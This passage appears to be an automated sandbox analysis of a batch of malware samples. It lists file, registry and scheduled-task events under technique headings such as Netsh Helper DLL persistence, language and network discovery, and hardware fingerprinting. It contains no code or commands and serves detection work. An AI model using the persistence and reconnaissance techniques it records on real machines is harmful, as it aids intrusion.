File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File created C:\Windows\SystemTemp\c6a973e3-7f65-4dd5-8924-fd63f9e6c8d9.tmp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\msedge_installer.log C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\metadata C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{CC4FC0BF-4A61-4E0F-A09F-705099E62A66}\EDGEMITMP_3897D.tmp\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\settings.dat C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.59\Installer\setup.exe N/A
File opened for modification C:\Windows\SystemTemp\MsEdgeCrashpad\throttle_store.dat C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\setup.exe N/A
File opened for modification C:\Windows\Tasks\Test Task17.job C:\Windows\system32\svchost.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Rage.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Ewpeloxttug.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\PowerRat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\856.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\ciscotest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\7777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\7777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\q1wnx5ir.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\svc1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\99awhy8l.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\surfex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\StUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\StUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\qNVQKFyM.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\temp_16933.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\7777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\program files (x86)\internet explorer\iexplore.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\TCP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\q1wnx5ir.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\ProcessMonitor\Procmon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\msf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\Fast%20Download.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\temp_16933.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\7777.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\temp_16933.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\sommnx\bmxe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Desktop\Files\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\WerFault.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\werfault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Windows\system32\werfault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 C:\Windows\SysWOW64\WerFault.exe N/A
